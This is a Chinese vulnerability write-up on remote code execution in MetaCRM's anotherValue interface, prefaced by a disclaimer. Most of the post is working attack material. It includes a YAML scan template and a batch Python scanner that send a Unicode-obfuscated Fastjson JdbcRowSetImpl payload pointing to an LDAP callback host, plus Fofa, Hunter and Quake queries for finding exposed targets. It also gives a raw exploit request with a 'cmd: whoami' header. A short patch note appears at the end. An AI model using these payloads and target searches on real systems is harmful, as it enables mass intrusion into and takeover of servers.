美特-crm anothervalue远程命令执行

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

POC（Yaml&Python）

话不多说先上POC（Yam-poc由yakit或ProjectDiscovery Cloud Platform生成，Python-poc脚本由chatgpt生成，准确性请自测.

id: met-crm-remote-code-execution

info:
  name: Remote Code Execution in Met CRM
  author: onewin
  severity: critical
  description: Checks for RCE vulnerability in Met CRM via crafted JSON payload.
  tags: rce,cve,met-crm

requests:
  - method: POST
    path:
      - "{{BaseURL}}/eai/someValue/anotherValue"

    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate, br
      Accept-Language: zh-CN,zh;q=0.9
      Cache-Control: no-cache
      Connection: close
      Content-Type: application/json
      Cookie: JSESSIONID=E010A1A6DED8C9644CFAB420D41F4EB7
      Pragma: no-cache
      Upgrade-Insecure-Requests: 1

    body: |
      {"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://{{interactsh-url}}","autoCommit":true}}


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "dns"
        part: interactsh_protocol # This checks if the DNS interaction contains expected data indicating exploitation success.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import time
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

# 打印颜色
RED = '\033[91m'
RESET = '\033[0m'
# 禁用不安全请求警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def get_dnslog():
    response = requests.get('http://www.dnslog.cn/getdomain.php')
    return response.text.strip()

def check_dnslog(dnslog):
    check_url = f'http://www.dnslog.cn/getrecords.php?t={dnslog}'
    response = requests.get(check_url)
    return dnslog in response.text

def check_vulnerability(url,dnslog_url):
    data = {
        "b": {
            "\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c",
            "\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":f"ldap://{dnslog_url}",
            "autoCommit": "true"
        }
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Content-Type': 'application/json',
        'Cookie': 'JSESSIONID=E010A1A6DED8C9644CFAB420D41F4EB7',
        'Cache-Control': 'no-cache',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Pragma': 'no-cache',
    }
    path = "/eai/someValue/anotherValue"
    try:
        response = requests.post(url + path, json=data, headers=headers, verify=False)
        time.sleep(5)
        if check_dnslog(dnslog_url):
            print(f"{RED}{url} 可能存在美特-crm anothervalue远程命令执行漏洞{RESET}")
        else:
            print(f"{url} 漏洞不存在")
    except requests.RequestException as e:
        print(f"请求失败: {e}")

def main():
    parser = argparse.ArgumentParser(description='检查目标URL是否存在美特-crm anothervalue远程命令执行漏洞。')
    parser.add_argument('-u', '--url', help='指定目标URL')
    parser.add_argument('-f', '--file', help='指定包含多个目标URL的文本文件')

    args = parser.parse_args()

    dnslog_url = get_dnslog()

    if args.url:
        check_vulnerability(args.url, dnslog_url)
    elif args.file:
        with open(args.file, 'r') as f:
            targets = f.read().splitlines()
            for target in targets:
                if not target.startswith("http://") and not target.startswith("https://"):
                    target = "http://" + target
                check_vulnerability(target, dnslog_url)

if __name__ == '__main__':
    main()

漏洞介绍

美特软件是CRM专业厂商和客户关系管理专家,MetaCRM是一款智能平台化CRM软件,通过提升企业管理和协同办公,全面提高企业管理水平和运营效率,帮助企业实现卓越管理。其anothervalue接口存在远程代码执行漏洞，可被恶意攻击者利用执行任意命令，进而控制服务器系统。

资产测绘

• 「Fofa」

body="/common/scripts/basic.js"

• 「Hunter」

web.body="/common/scripts/basic.js"

• 「Quake」

body="/common/scripts/basic.js"

漏洞复现

「1、构造数据包」

POST /eai/someValue/anotherValue HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Length: 373
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Content-Type: application/json
Cookie: JSESSIONID=E010A1A6DED8C9644CFAB420D41F4EB7
Pragma: no-cache
Upgrade-Insecure-Requests: 1
cmd: whoami

{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://fpwnnkhmfn.dgrh3.cn","autoCommit":true}}

「2、查看dnslog记录」

修复方案

官方已发布安全补丁，建议联系厂商打补丁或升级版本。

关闭非必要接口的访问权限。

引入Web应用防火墙防护，配置接口拦截策略。